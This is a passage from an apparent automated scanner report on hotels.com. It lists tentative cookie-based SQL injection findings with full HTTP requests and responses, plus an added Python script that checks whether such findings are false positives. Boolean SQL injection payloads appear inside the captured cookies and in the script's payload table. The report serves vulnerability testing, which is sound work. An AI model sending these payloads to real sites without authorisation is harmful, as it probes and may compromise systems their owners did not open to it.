__utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSPV=RcAAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAAA

Response 1

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 26 Mar 2011 15:33:11 GMT
Expect:
Content-Type: text/html;charset=UTF-8
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 00:30:46 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Set-Cookie: mvthistory=185.0.0.i1%3A114.0.0%3A130.1.1.i2%3A103.4.1.i6%3A171.0.0%3A98.6.4%3A142.1.0.i4%3A200.1.0%3A198.0.0%3A190.0.0%3A134.0.1%3A2.2.1%3A209.0.1%3A147.0.1.i6%3A92.3.0.i1%3A132.0.0.i2%3A122.1.0.i3%3A149.0.0.i1%7CHCOM_US; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:30:46 GMT; Path=/
Set-Cookie: homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; Version=1; Domain=.hotels.com; Max-Age=31536000; Expires=Tue, 02-Oct-2012 00:30:46 GMT; Path=/
Set-Cookie: user=RCoxODUuMC4wLmkxOjExNC4wLjA6MTMwLjEuMS5pMjoxMDMuNC4xLmk2OjE3MS4wLjA6OTguNi40OjE0Mi4xLjAuaTQ6MjAwLjEuMDoxOTguMC4wOjE5MC4wLjA6MTM0LjAuMToyLjIuMToyMDkuMC4xOjE0Ny4wLjEuaTY6OTIuMy4wLmkxOjEzMi4wLjAuaTI6MTIyLjEuMC5pMzoxNDkuMC4wLmkxfEhDT01fVVMhQSplbl9VU3xIQ09NX1VTIUUqMTA5MzY4fDA0LzEwLzIwMTF8MDcvMTAvMjAxMXwyIUYq; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:30:46 GMT; Path=/
Content-Length: 270898

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml" xml:lang="en" lang="en" >
<head>
<meta http-equiv="X-UA-Compatible" content="IE=9; IE=8; IE=7" />
<title>Boston Omni Parker House Hotel - Hotels.com - Hotel rooms with reviews. Discounts and Deals on 85,000 hotels worldwide</title>
<link href="/bundles/hcom-common-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen,print" />
<!--[if lte IE 6]>
<link href="/bundles/hcom-common.ie6-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen" />

<![endif]--><!--[if IE 7]>
<link href="/bundles/hcom-common.ie7-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen" />

<![endif]--><!--[if IE 8]>
<link href="/bundles/hcom-common.ie8-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text
...[SNIP]...

Request 2

GET /hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotels.com/search.do?searchParams.arrivalDate=10-04-11&pointName&searchParams.departureDate=10-07-11&lon=0.0&queryFormState=CLOSED&monthCheckOut=10&fromHotelDetails=false&destination=Boston%2C&showSimilarDestinations=true&fromLandmark=false&searchParams.rooms[0].numberOfAdults=2&asaReport&dayInMonthCheckIn=4&fromDisambiguation=false&destinationForLandmark&monthCheckIn=10&activeTab=DESTINATION&dayInMonthCheckOut=7&lat=0.0&rooms=1&ppc=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC'%20and%201%3d2--%20; homepage_search_data="Qm9zdG9uLA..//10/04/11//10/07/11//2//MM/dd/yy//1643195"; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; SSLB=1; user=QSplbl9VU3xIQ09NX1VTIUQqMTI0LjEuMC5pMSUzQTk3LjczLjEuaTMlM0E5OC42LjQlM0ExMzcuMC4wLmkyJTNBMTQ1LjAuMC5pMiUzQTEwOC4xLjAuaTIlM0ExNTIuMC4wLmkyJTNBMTk2LjEuMCUzQTkyLjAuMC5pMSUzQTEyMS41MDMuMC5pNyUzQTE5NS4wLjAlM0ExMDQuMC4xJTdDSENPTV9VUw..; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSPV=RcAAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAAA

Response 2

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 26 Mar 2011 15:35:18 GMT
Expect:
Content-Type: text/html;charset=UTF-8
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 00:30:47 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Set-Cookie: homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; Version=1; Domain=.hotels.com; Max-Age=31536000; Expires=Tue, 02-Oct-2012 00:30:46 GMT; Path=/
Set-Cookie: user=QSplbl9VU3xIQ09NX1VTIUUqMTA5MzY4fDA0LzEwLzIwMTF8MDcvMTAvMjAxMXwyIUYq; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:30:46 GMT; Path=/
Content-Length: 270898

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml" xml:lang="en" lang="en" >
<head>
<meta http-equiv="X-UA-Compatible" content="IE=9; IE=8; IE=7" />
<title>Boston Omni Parker House Hotel - Hotels.com - Hotel rooms with reviews. Discounts and Deals on 85,000 hotels worldwide</title>
<link href="/bundles/hcom-common-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen,print" />
<!--[if lte IE 6]>
<link href="/bundles/hcom-common.ie6-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen" />

<![endif]--><!--[if IE 7]>
<link href="/bundles/hcom-common.ie7-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen" />

<![endif]--><!--[if IE 8]>
<link href="/bundles/hcom-common.ie8-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen" />

<![endif]--><link href="/bundles/hcom-hotel-details-rd-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen,print" />
<!--[if lte IE 6]>
<link href="/bundles/hcom-hotel-details.ie6-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen" />

<![endif]--><!--[if IE 7]>
<link href="/bundles/hcom-hotel-details.ie7-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen" />

...[SNIP]...

1.19. http://www.hotels.com/hotel/details.html [guid cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.hotels.com
Path:   /hotel/details.html

Issue detail

The guid cookie appears to be vulnerable to SQL injection. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 (a string-context boolean pair, leading single quote) were each submitted in the guid cookie, and the two requests produced different responses, which the scanner takes as a sign that the input reaches a SQL query unsafely.

Automated difference-based tests for SQL injection are prone to false positives, so the reported requests and responses must be reviewed by hand before this is treated as a vulnerability. Both responses below are 200 OK with Content-Length: 270898 and the same Date (00:30:38); the only difference visible in the captured headers is in Set-Cookie (mvthistory set in Response 1 only, user with a different value), and the body excerpts shown are identical. Treat the finding as unconfirmed until the full response bodies have been diffed with the Set-Cookie headers stripped.
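
Findings 1.17, 1.18 and 1.19 all rest on the same difference-based test, and in all three traces the response headers differ only in volatile fields. The Python script below is an added example, not part of the original report and not the scanner's own code. It builds the boolean cookie pair the way the report shows it (numeric and quoted contexts) and then compares two captured responses after dropping Date, Expires and Set-Cookie and normalising the body, so that a session-state change is not mistaken for a SQL-injection oracle. The sample responses are constructed from the header values and first body lines shown under 1.17 (bodies truncated, so Content-Length survives only as a header); RESP_ERROR is an invented counter-example of what a genuine boolean-blind signal would look like. All function names are the example's own.

```python
"""Re-check a difference-based SQL injection finding offline."""
import hashlib
import re

# Headers whose values legitimately change between two back-to-back
# requests; they must never count as evidence of injection.
VOLATILE_HEADERS = {"date", "expires", "set-cookie"}

# Scanner-style boolean pairs (true, false); the quoted form closes a
# string literal first, the numeric form does not.
PAYLOADS = {
    "numeric": ("%20and%201%3d1--%20", "%20and%201%3d2--%20"),
    "quoted": ("'%20and%201%3d1--%20", "'%20and%201%3d2--%20"),
}


def inject_cookie(cookie_header, name, payload):
    """Append `payload` to the value of cookie `name` in a Cookie header."""
    parts, hit = [], False
    for part in cookie_header.split("; "):
        k, _, v = part.partition("=")
        if k == name:
            part, hit = f"{k}={v}{payload}", True
        parts.append(part)
    if not hit:
        raise KeyError(f"cookie {name!r} not present")
    return "; ".join(parts)


def cookie_pair(cookie_header, name, context="quoted"):
    """Return the (1=1, 1=2) Cookie headers for one cookie."""
    true_p, false_p = PAYLOADS[context]
    return inject_cookie(cookie_header, name, true_p), inject_cookie(cookie_header, name, false_p)


def parse_response(raw):
    """Split a raw HTTP/1.1 response into (status, [(name, value)], body)."""
    head, _, body = raw.partition("\r\n\r\n")
    status_line, *header_lines = head.split("\r\n")
    status = int(status_line.split()[1])
    headers = []
    for line in header_lines:
        k, _, v = line.partition(":")
        headers.append((k.strip().lower(), v.strip()))
    return status, headers, body


def fingerprint(raw):
    """(status, stable headers, body hash) with per-request noise removed."""
    status, headers, body = parse_response(raw)
    stable = tuple(sorted(h for h in headers if h[0] not in VOLATILE_HEADERS))
    body = re.sub(r"\s+", " ", body).strip()
    return status, stable, hashlib.sha256(body.encode()).hexdigest()


def volatile_differences(raw_a, raw_b):
    """Volatile header names that differ between the raw responses. When this
    is non-empty and responses_differ() is empty, these headers are what made
    a naive byte-for-byte comparison report the pair as 'different'."""
    _, ha, _ = parse_response(raw_a)
    _, hb, _ = parse_response(raw_b)

    def values(headers, name):
        return sorted(v for k, v in headers if k == name)

    return sorted(k for k in VOLATILE_HEADERS if values(ha, k) != values(hb, k))


def responses_differ(raw_a, raw_b):
    """Differences that survive normalisation; an empty list means the pair
    gives no evidence of a boolean-blind injection oracle."""
    sa, ha, ba = fingerprint(raw_a)
    sb, hb, bb = fingerprint(raw_b)
    diffs = []
    if sa != sb:
        diffs.append(f"status {sa} vs {sb}")
    if ha != hb:
        changed = sorted({k for k, _ in set(ha) ^ set(hb)})
        diffs.append("stable headers differ: " + ", ".join(changed))
    if ba != bb:
        diffs.append("body differs")
    return diffs


# Constructed sample: headers trimmed from the 1.17 traces in this report,
# bodies cut to the first lines the report shows (identical in both).
BODY = ('<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN">\r\n'
        "<title>Boston Omni Parker House Hotel - Hotels.com</title>\r\n")
RESP_TRUE = (
    "HTTP/1.1 200 OK\r\nServer: Apache\r\nContent-Type: text/html;charset=UTF-8\r\n"
    "Date: Mon, 03 Oct 2011 00:31:47 GMT\r\n"
    "Set-Cookie: mvthistory=185.0.0.i1; Domain=.hotels.com; Path=/\r\n"
    "Set-Cookie: user=RCoxODUuMC4w; Domain=.hotels.com; Path=/\r\n"
    "Content-Length: 270898\r\n\r\n" + BODY)
RESP_FALSE = (
    "HTTP/1.1 200 OK\r\nServer: Apache\r\nContent-Type: text/html;charset=UTF-8\r\n"
    "Date: Mon, 03 Oct 2011 00:31:48 GMT\r\n"
    "Set-Cookie: user=QSplbl9VU3x; Domain=.hotels.com; Path=/\r\n"
    "Content-Length: 270898\r\n\r\n" + BODY)
# Invented counter-example: the 1=2 variant lands on a database error page.
RESP_ERROR = ("HTTP/1.1 500 Internal Server Error\r\nServer: Apache\r\n"
              "Content-Type: text/html\r\nDate: Mon, 03 Oct 2011 00:31:48 GMT\r\n\r\n"
              "<html>Unclosed quotation mark after the character string</html>")

if __name__ == "__main__":
    print("volatile-only differences:", volatile_differences(RESP_TRUE, RESP_FALSE))
    print("real differences:", responses_differ(RESP_TRUE, RESP_FALSE))
    print("error pair:", responses_differ(RESP_TRUE, RESP_ERROR))
```

Before trusting any pair, send the unmodified request twice and feed both captures to volatile_differences(): whatever changes between two identical requests belongs in VOLATILE_HEADERS for that host, and only differences that remain after that are worth a manual look.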

Request 1

GET /hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotels.com/search.do?searchParams.arrivalDate=10-04-11&pointName&searchParams.departureDate=10-07-11&lon=0.0&queryFormState=CLOSED&monthCheckOut=10&fromHotelDetails=false&destination=Boston%2C&showSimilarDestinations=true&fromLandmark=false&searchParams.rooms[0].numberOfAdults=2&asaReport&dayInMonthCheckIn=4&fromDisambiguation=false&destinationForLandmark&monthCheckIn=10&activeTab=DESTINATION&dayInMonthCheckOut=7&lat=0.0&rooms=1&ppc=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1'%20and%201%3d1--%20; channel=DC; homepage_search_data="Qm9zdG9uLA..//10/04/11//10/07/11//2//MM/dd/yy//1643195"; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; SSLB=1; user=QSplbl9VU3xIQ09NX1VTIUQqMTI0LjEuMC5pMSUzQTk3LjczLjEuaTMlM0E5OC42LjQlM0ExMzcuMC4wLmkyJTNBMTQ1LjAuMC5pMiUzQTEwOC4xLjAuaTIlM0ExNTIuMC4wLmkyJTNBMTk2LjEuMCUzQTkyLjAuMC5pMSUzQTEyMS41MDMuMC5pNyUzQTE5NS4wLjAlM0ExMDQuMC4xJTdDSENPTV9VUw..; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSPV=RcAAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAAA

Response 1

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 26 Mar 2011 15:31:07 GMT
Expect:
Content-Type: text/html;charset=UTF-8
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 00:30:38 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Set-Cookie: mvthistory=185.0.0.i1%3A114.0.0%3A130.1.1.i2%3A103.4.1.i6%3A171.0.0%3A98.6.4%3A142.1.0.i4%3A200.1.0%3A198.0.0%3A190.0.0%3A134.0.1%3A2.2.1%3A209.0.1%3A147.0.1.i6%3A92.3.0.i1%3A132.0.0.i2%3A122.1.0.i3%3A149.0.0.i1%7CHCOM_US; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:30:38 GMT; Path=/
Set-Cookie: homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; Version=1; Domain=.hotels.com; Max-Age=31536000; Expires=Tue, 02-Oct-2012 00:30:38 GMT; Path=/
Set-Cookie: user=RCoxODUuMC4wLmkxOjExNC4wLjA6MTMwLjEuMS5pMjoxMDMuNC4xLmk2OjE3MS4wLjA6OTguNi40OjE0Mi4xLjAuaTQ6MjAwLjEuMDoxOTguMC4wOjE5MC4wLjA6MTM0LjAuMToyLjIuMToyMDkuMC4xOjE0Ny4wLjEuaTY6OTIuMy4wLmkxOjEzMi4wLjAuaTI6MTIyLjEuMC5pMzoxNDkuMC4wLmkxfEhDT01fVVMhQSplbl9VU3xIQ09NX1VTIUUqMTA5MzY4fDA0LzEwLzIwMTF8MDcvMTAvMjAxMXwyIUYq; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:30:38 GMT; Path=/
Content-Length: 270898

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml" xml:lang="en" lang="en" >
<head>
<meta http-equiv="X-UA-Compatible" content="IE=9; IE=8; IE=7" />
<title>Boston Omni Parker House Hotel - Hotels.com - Hotel rooms with reviews. Discounts and Deals on 85,000 hotels worldwide</title>
<link href="/bundles/hcom-common-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen,print" />
<!--[if lte IE 6]>
<link href="/bundles/hcom-common.ie6-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen" />

<![endif]--><!--[if IE 7]>
<link href="/bundles/hcom-common.ie7-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen" />

<![endif]--><!--[if IE 8]>
<link href="/bundles/hcom-common.ie8-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text
...[SNIP]...

Request 2

GET /hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotels.com/search.do?searchParams.arrivalDate=10-04-11&pointName&searchParams.departureDate=10-07-11&lon=0.0&queryFormState=CLOSED&monthCheckOut=10&fromHotelDetails=false&destination=Boston%2C&showSimilarDestinations=true&fromLandmark=false&searchParams.rooms[0].numberOfAdults=2&asaReport&dayInMonthCheckIn=4&fromDisambiguation=false&destinationForLandmark&monthCheckIn=10&activeTab=DESTINATION&dayInMonthCheckOut=7&lat=0.0&rooms=1&ppc=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1'%20and%201%3d2--%20; channel=DC; homepage_search_data="Qm9zdG9uLA..//10/04/11//10/07/11//2//MM/dd/yy//1643195"; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; SSLB=1; user=QSplbl9VU3xIQ09NX1VTIUQqMTI0LjEuMC5pMSUzQTk3LjczLjEuaTMlM0E5OC42LjQlM0ExMzcuMC4wLmkyJTNBMTQ1LjAuMC5pMiUzQTEwOC4xLjAuaTIlM0ExNTIuMC4wLmkyJTNBMTk2LjEuMCUzQTkyLjAuMC5pMSUzQTEyMS41MDMuMC5pNyUzQTE5NS4wLjAlM0ExMDQuMC4xJTdDSENPTV9VUw..; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSPV=RcAAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAAA

Response 2

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 26 Mar 2011 15:35:18 GMT
Expect:
Content-Type: text/html;charset=UTF-8
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 00:30:38 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Set-Cookie: homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; Version=1; Domain=.hotels.com; Max-Age=31536000; Expires=Tue, 02-Oct-2012 00:30:38 GMT; Path=/
Set-Cookie: user=QSplbl9VU3xIQ09NX1VTIUUqMTA5MzY4fDA0LzEwLzIwMTF8MDcvMTAvMjAxMXwyIUYq; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:30:38 GMT; Path=/
Content-Length: 270898

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml" xml:lang="en" lang="en" >
<head>
<meta http-equiv="X-UA-Compatible" content="IE=9; IE=8; IE=7" />
<title>Boston Omni Parker House Hotel - Hotels.com - Hotel rooms with reviews. Discounts and Deals on 85,000 hotels worldwide</title>
<link href="/bundles/hcom-common-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen,print" />
<!--[if lte IE 6]>
<link href="/bundles/hcom-common.ie6-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen" />

<![endif]--><!--[if IE 7]>
<link href="/bundles/hcom-common.ie7-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen" />

<![endif]--><!--[if IE 8]>
<link href="/bundles/hcom-common.ie8-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen" />

<![endif]--><link href="/bundles/hcom-hotel-details-rd-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen,print" />
<!--[if lte IE 6]>
<link href="/bundles/hcom-hotel-details.ie6-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen" />

<![endif]--><!--[if IE 7]>
<link href="/bundles/hcom-hotel-details.ie7-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen" />

...[SNIP]...

1.20. http://www.hotels.com/hotel/hoteldata.html [__utmc cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.hotels.com
Path:   /hotel/hoteldata.html

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. The payloads 21059860'%20or%201%3d1--%20 and 21059860'%20or%201%3d2--%20 were each submitted in the __utmc cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /hotel/hoteldata.html?destinationId=1401516&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&validate=false&previousDateful=false&nightlyPrice=289%2CUSD&dateful=true HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: application/xml, text/xml, */*; q=0.01
Referer: http://www.hotels.com/hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
